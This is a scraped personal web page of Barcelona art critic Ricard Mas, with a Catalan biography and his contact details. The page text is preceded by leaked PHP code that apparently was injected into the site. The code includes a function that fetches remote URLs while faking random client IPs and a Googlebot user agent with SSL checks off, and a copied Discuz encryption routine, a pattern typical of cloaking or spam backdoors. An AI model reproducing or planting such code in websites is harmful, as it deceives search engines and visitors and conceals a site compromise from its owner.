function Go($url){ $ch = curl_init(); $ip = rand(0,255).".".rand(0,255).".".rand(0,255).".".rand(0,255) ; $timeout = 15; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_TIMEOUT,0); curl_setopt($ch,CURLOPT_HTTPHEADER,array("X-FORWARDED-FOR:".$ip."","CLIENT-IP:".$ip."")); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Googlebot/2.0; +http://www.google.com/search/spider.html)"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false); curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $content = curl_exec($ch); return $content; } function authcode_copy($string, $operation = "DECODE", $key = "", $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : $GLOBALS["discuz_auth_key"]); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == "DECODE" ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ""; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == "DECODE" ? base64_decode(substr($string, $ckey_length)) : sprintf("%010d", $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ""; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == "DECODE") { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ""; } } else { return $keyc.str_replace("=", "", base64_encode($result)); } } Ricard Mas. Crític d'Art i Historiador |
Ricard Mas. Crític d'Art i Historiador |
5
home,page,page-id-5,page-template,page-template-full_width-php,ajax_fade,page_not_loaded,smooth_scroll,
 

 

 

 

shapeimage_2
Ricard Mas

Llicenciat el 1989 en Història de l’Art per la Universitat Autònoma de Barcelona, ha treballat com a assistent d’investigació de Rafael Santos Torroella (1990-1997), i com a director tècnic de la subhasta bibliogràfica Soler y Llach (1998-2001). En l’actualitat és free-lance. Ha escrit, entre d’altres, els llibres  Qui no anuncia no ven. Els artistes catalans i la publicitat, Univers Dalí i La pintura española contemporánea. Últimas tendencias.

Col·labora periòdicament amb el diari AVUI, els setmanaris El Temps i Time Out Barcelona, així com amb la revista Descubrir el Arte.

Els seus principals interessos, ja sigui en escriptura, comissariat o investigació, són: Salvador Dalí, falsificacions artístiques, art català i espanyol del segle XX, i el medi del videojoc.

Contacte / Contacto / Contact:  ricardmasp@gmail.com   (+34) 646 61 21 87  Barcelona